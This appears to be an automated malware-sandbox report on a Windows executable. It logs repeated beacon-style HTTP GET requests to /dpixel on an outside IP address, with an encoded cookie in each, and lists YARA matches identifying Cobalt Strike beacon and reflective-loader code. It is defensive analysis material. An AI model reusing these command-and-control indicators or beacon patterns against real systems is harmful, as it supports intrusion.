                  Date: Fri, 3 Jan 2025 01:55:15 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  102192.168.2.45010542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:16 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:17 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:16 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  103192.168.2.45010642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:18 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:18 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:18 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  104192.168.2.45010742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:20 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:20 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:20 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  105192.168.2.45010842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:22 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:22 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:22 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  106192.168.2.45010942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:23 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:24 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:24 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  107192.168.2.45011042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:25 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:26 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:26 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  108192.168.2.45011142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:27 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:28 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:27 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  109192.168.2.45011242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:29 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:29 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:29 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  110192.168.2.45011342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:31 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:31 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:31 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  111192.168.2.45011442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:33 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:33 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  112192.168.2.45011542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:34 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:35 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:35 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  113192.168.2.45011642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:36 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:37 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:37 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  114192.168.2.45011742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:38 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:39 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  115192.168.2.45011842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:40 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:41 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:40 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  116192.168.2.45011942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:42 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:43 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:42 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  117192.168.2.45012042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:44 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:44 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:44 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  118192.168.2.45012142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:46 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:46 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:46 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  119192.168.2.45012242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:48 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:48 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:48 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  120192.168.2.45012342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:50 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:50 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:50 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  121192.168.2.45012442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:51 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:52 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:52 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  122192.168.2.45012542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:53 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:54 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:54 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  123192.168.2.45012642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:55 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:56 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:56 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  124192.168.2.45012742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:58 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:58 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:58 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  125192.168.2.45012842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:59 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:56:00 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:56:00 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Target ID:0
                  Start time:20:51:53
                  Start date:02/01/2025
                  Path:C:\Users\user\Desktop\yZah650lHL.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\yZah650lHL.exe"
                  Imagebase:0x400000
                  File size:328'704 bytes
                  MD5 hash:5ED55475A1FE6C18C1A67FA8C7008661
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                  • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                  • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                  Reputation:low
                  Has exited:false

                    Execution Graph

                    Execution Coverage:1.9%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:11.3%
                    Total number of Nodes:319
                    Total number of Limit Nodes:19

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4113625005.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.4113602550.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.4113649061.0000000000404000.00000004.00000001.01000000.00000003.sdmp
